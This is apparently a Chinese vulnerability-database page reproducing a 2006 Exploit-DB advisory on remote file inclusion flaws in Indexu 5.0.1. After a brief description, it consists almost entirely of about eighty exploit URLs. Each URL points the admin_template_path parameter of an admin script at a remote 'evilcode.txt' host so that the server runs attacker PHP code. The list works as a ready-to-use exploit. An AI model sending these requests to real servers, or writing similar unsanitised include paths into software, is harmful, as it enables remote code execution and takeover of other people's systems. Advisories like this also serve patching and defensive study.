Indexu 5.0.1 - Multiple Remote File Inclusions

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1055760 漏洞类型
发布时间 2006-06-16 更新时间 2006-06-16
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/28038
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/18477/info

Indexu is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

http://www.example.com/indexu/admin/app_change_email.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/app_change_pwd.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/app_mod_rewrite.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/app_page_caching.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/app_setup.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/cat_add.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/cat_delete.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/cat_edit.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/cat_path_update.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/cat_search.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/cat_struc.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/cat_view.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/cat_view_hidden.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/cat_view_hierarchy.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/cat_view_registered_only.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/checkurl_web.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/db_alter.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/db_alter_change.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/db_backup.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/db_export.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/db_import.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/editor_add.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/editor_delete.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/editor_validate.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/head.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/index.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/inv_config.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/inv_config_payment.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/inv_create.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/inv_delete.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/inv_edit.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/inv_markpaid.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/inv_markunpaid.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/inv_overdue.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/inv_paid.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/inv_send.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/inv_unpaid.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/lang_modify.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/link_add.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/link_bad.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/link_bad_delete.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/link_checkurl.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/link_delete.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/link_duplicate.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/link_edit.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/link_premium_listing.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/link_premium_sponsored.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/link_search.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/link_sponsored_listing.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/link_validate.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/link_validate_edit.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/link_view.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/log_search.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/mail_modify.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/menu.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/message_create.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/message_delete.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/message_edit.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/message_send.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/message_subscriber.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/message_view.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/review_validate.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/review_validate_edit.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/summary.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/template_active.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/template_add_custom.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/template_delete.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/template_delete_file.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/template_duplicate.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/template_export.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/template_import.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/template_manager.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/template_modify.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/template_modify_file.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/template_rename.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/user_add.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/user_delete.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/user_edit.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/user_search.php?admin_template_path=http://evilcode.txt?
http://www.example.com/indexu/admin/whos.php?admin_template_path=http://evilcode.txt?